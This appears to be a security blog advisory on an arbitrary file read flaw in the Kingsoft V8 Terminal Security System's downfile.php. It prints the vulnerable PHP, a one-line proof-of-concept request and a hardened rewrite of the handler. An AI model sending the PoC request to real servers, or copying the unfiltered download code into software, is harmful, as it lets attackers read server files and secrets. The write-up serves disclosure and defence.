Kingsoft V8 Terminal Security System downfile.php Arbitrary File Reading Vulnerability
Vulnerability Description
The Kingsoft V8 Terminal Security System has an arbitrary file read vulnerability. An attacker can use it to download any file on the server.
Vulnerability Impact
Kingsoft V8 terminal security system
Network surveying and mapping
Vulnerability Reproduction
The vulnerable file is /Console/htmltopdf/downfile.php
<?php
$filename= $_GET["filename"];
$filename=iconv("UTF-8","GBK//IGNORE", $filename);
header("Cache-Control: public");
header("Content-Description: File Transfer");
header('Content-disposition: attachment; filename='.$filename); // file name
header("Content-Type: application/zip"); // zip format
header("Content-Transfer-Encoding: binary"); // tell the browser this is a binary file
header('Content-Length: '. filesize($filename)); // tell the browser the file size
@readfile($filename);
?>
The file performs no filtering, so any file can be downloaded through the filename parameter. The PoC is:
/htmltopdf/downfile.php?filename=downfile.php
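A hardened form of the same download handler, added here as an example; it is not Kingsoft's code or a vendor patch. It assumes the endpoint is only meant to serve generated .zip files from a single directory; EXPORT_DIR and resolve_download() are hypothetical names.

```php
<?php
// Added example, not vendor code. EXPORT_DIR and resolve_download() are
// hypothetical names; the directory is assumed to hold only generated archives.
const EXPORT_DIR = __DIR__ . '/export';

function resolve_download(string $requested, string $baseDir): ?string
{
    // Accept a bare file name only: no NUL, path separators or drive/stream colon.
    if ($requested === '' || strpbrk($requested, "\0/\\:") !== false) {
        return null;
    }
    // Allowlist the one type this endpoint claims to serve (application/zip).
    if (strtolower(pathinfo($requested, PATHINFO_EXTENSION)) !== 'zip') {
        return null;
    }
    // Same GBK conversion as the original script, applied after validation.
    $name = iconv('UTF-8', 'GBK//IGNORE', $requested);
    $base = realpath($baseDir);
    if ($name === false || $name === '' || $base === false) {
        return null;
    }
    // Canonicalise, then require the result to sit inside the base directory.
    $path = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($path === false || !is_file($path)
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$raw = $_GET['filename'] ?? '';
$path = is_string($raw) ? resolve_download($raw, EXPORT_DIR) : null;
if ($path === null) {
    http_response_code(404); // same answer for "missing" and "not allowed"
    exit;
}
header('Cache-Control: private, no-store');
header('Content-Description: File Transfer');
header('Content-Type: application/zip');
header('X-Content-Type-Options: nosniff');
// rawurlencode() keeps CR/LF and quotes out of the header value.
header("Content-Disposition: attachment; filename*=UTF-8''" . rawurlencode($raw));
header('Content-Length: ' . filesize($path));
readfile($path);
```

With this check in place, the request shown above returns 404, because downfile.php is not a .zip file inside the export directory.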
This post is licensed under CC BY 4.0 by the author.